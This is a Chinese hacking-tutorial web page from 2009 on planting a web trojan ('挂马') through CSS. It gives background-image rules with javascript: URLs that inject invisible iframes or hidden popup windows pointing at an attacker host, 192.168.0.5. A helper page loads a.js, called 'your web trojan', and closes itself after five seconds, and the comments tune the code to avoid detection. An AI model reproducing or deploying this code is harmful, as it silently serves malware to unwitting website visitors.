当前位置: 首页 > 图文教程 > 网络安全 > 黑客技术 > 真正能用,还有点效果的CSS挂马代码的方法

黑客技术
密码破解以及抗击手段(1)
密码破解以及抗击手段(2)
密码破解以及抗击手段(3)
密码破解以及抗击手段(4)
加密解密大比拼(1)
加密解密大比拼(2)
加密解密大比拼(3)
加密解密大比拼(4)
加密解密大比拼(5)
加密解密大比拼(6)
加密解密大比拼(7)
密码与Crack工具研究(1)
密码与Crack工具研究(2)
密码与Crack工具研究(3)
密码与Crack工具研究(4)
软件狗[Dongles]的加密与解密技术(1)
软件狗[Dongles]的加密与解密技术(2)
软件狗[Dongles]的加密与解密技术(3)
软件狗[Dongles]的加密与解密技术(4)
软件狗[Dongles]的加密与解密技术(5)

黑客技术 中的 真正能用,还有点效果的CSS挂马代码的方法


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 98 ::
收藏到网摘: n/a

网上流行的:
body
{
background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法会使主页不正常.返回一片空白.
用弹窗.
body
{
background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//弹出一个框.难看 易被发现.
改进一下:
body
{
background-image: url(javascript:open('http://192.168.0.5/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}
test.htm里面的代码,a.js为你的网马,弹出一个不可见的窗口,并在5秒自动后关闭没提示:
<script src="a.js"></script>
<script>
window.opener=null;setTimeout("window.close();",5000);
</script>
a.js内容:
document.write('<Iframe src="http://192.168.0.5/calc.htm"></iframe>');
请指教.